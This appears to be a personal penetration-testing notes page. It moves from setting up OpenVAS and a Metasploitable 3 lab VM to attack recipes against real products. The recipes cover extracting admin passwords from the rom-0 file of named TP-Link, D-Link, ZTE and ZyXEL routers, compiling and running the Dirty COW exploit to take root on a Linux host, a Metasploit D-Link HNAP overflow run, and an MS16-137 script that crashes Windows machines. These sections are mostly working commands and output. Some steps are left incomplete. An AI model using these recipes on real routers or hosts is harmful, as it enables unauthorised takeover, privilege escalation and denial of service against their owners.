Installing OpenVAS

# apt-get install openvas
After this operation, 1,057 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Image.png
# apt autoremove
# openvas-setup
When the OpenVAS setup process is finished the OpenVAS manager, scanner and services are listening on port 9390, 9391, 9392 and on port 80. You can use the following netstat command to check if these services are listening

allow OpenVAS GUI being accessed from any ip
# cd /lib/systemd/system
# sed -e ‘s/127.0.0.1/0.0.0.0/g’ greenbone-security-assistant.service openvas-manager.service openvas-scanner.service -i
# systemctl daemon-reload
# systemctl restart greenbone-security-assistant.service openvas-manager.service openvas-scanner.service
# ss -nalt

if the ports not there then do
# openvas-start

change openvas admin password
# openvasmd –user=admin –new-password=new_password

login to OpenVAS GUI
if you can’t authenticate, maybe openvasmd isn’t running
# openvasmd
to create a new user with admin role
# openvasad -c add_user -u your_new_login_here -r Admin
to create a normal user
# openvasmd –create-user NEWUSER
to delete an user
# openvasmd –delete-user=NEWUSER

Creating Metasploitable 3 vm

Download
  1. Packer https://www.packer.io/downloads.html
  2. Vagrant https://releases.hashicorp.com/vagrant/
  3. VirtualBox https://www.virtualbox.org/wiki/Downloads
  4. Metasploitable 3 https://github.com/rapid7/metasploitable3
Install
  1. Vagrant
  2. Virtualbox
Unzip Metasploitable 3
move packer.exe into Metasploitable 3 folder
run PowerShell
> cd C:\Users\user1\Downloads\metasploitable3-master
> .\packer.exe build .\windows_2008_r2.json
You will see windows_2008_r2_virtualbox.box
> vagrant plugin install vagrant-reload
> vagrant box add windows_2008_r2_virtualbox.box –name metasploitable3
> vagrant up
Metasploitable 3 will automatically imported into VirtualBox and started the vm

-To convert Metasploitable 3 vm VirtualBox into VMware
open VirtualBox
shutdown Metasploitable 3 vm
click once Metasploitable 3 vm
click File/Export Appliance
choose metasplotable and set Fortmat: OVF 1.0
click Export with vm name metasploitable3.ova
open VMware
click File/Open
choose metasploitable3.ova
when it ask to Retry, click Retry

List of Metasplotable 3 vulnerabilities

Hacking AirLive, D-Link, Huawei, Pentagram, TP-Link, ZTE, ZynOS, ZyXEL router

This hack won’t always successful. It depend on whether the router already patched or not
Affected router:
AirLive WT-2000ARM
D-Link DSL-2640R
Huawei 520 HG
Huawei 530 TRA
Pentagram Cerberus P 6331-42
TP-Link TD-8816
TP-Link TD-W8901G
TP-Link TD-W8951ND
TP-Link TD-W8961ND
ZTE ZXV10 W300
ZynOS
ZyXEL ES-2024
ZyXEL Prestige P-2602HW

Choose target router and download rom-0
go to http://routeripaddress/rom-0

go to http://www.routerpwn.com/zynos/ and click Choose File
choose rom-0 file location and type Captcha
click Unpack rom-0
you will see something like these. The top one is the password

   98165274
   TP-LINK
   public
   public
   public
   public

Login to http://routeripaddress/ using
L: admin
P: 98165274

Takeover target linux using dcow

# mv 40847 40847.cpp
# g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

-copy dcow into your target linux
-login as normal user then later we will change root password
login as: user1
user1@10.0.10.31’s password:
$ bash
user1@ubuntu:~$ chmod 755 dcow
user1@ubuntu:~$ ./dcow -s
Running …
Password overridden to: dirtyCowFun
Received su prompt (Password: )
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak

root@ubuntu:~# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

DLink router attack

OPTION1:
Image.png
L: admin
P: TestingR2

OPTION2:
Image.png

OPTION3
This from LAN
# msfconsole
msf > use exploit/linux/http/dlink_hnap_login_bof
msf exploit(dlink_hnap_login_bof) > show options
Module options (exploit/linux/http/dlink_hnap_login_bof):
   Name      Current Setting  Required  Description
   —-      —————  ——–  ———–
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][…]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   SHELL     /bin/sh          yes       Don’t change this
   SHELLARG  sh               yes       Don’t change this
   SLEEP     0.5              yes       Seconds to sleep between requests (ARM only)
   SRVHOST   0.0.0.0          yes       IP address for the HTTP server (ARM only)
   SRVPORT   3333             yes       Port for the HTTP server (ARM only)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   VHOST                      no        HTTP server virtual host
Exploit target:
   Id  Name
   —  —-
   0   Dlink DIR-818 / 822 / 823 / 850 [MIPS]
msf exploit(dlink_hnap_login_bof) > set rhost TARGETIP
msf exploit(dlink_hnap_login_bof) > run

LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)

SOURCE:
This attack successfully restarted Windows XP-10 and 2008R2-2012R2
# wget
# unzip 40744
# python Lsass-remote.py targetip
Target windows will be restarted

SOLUTION: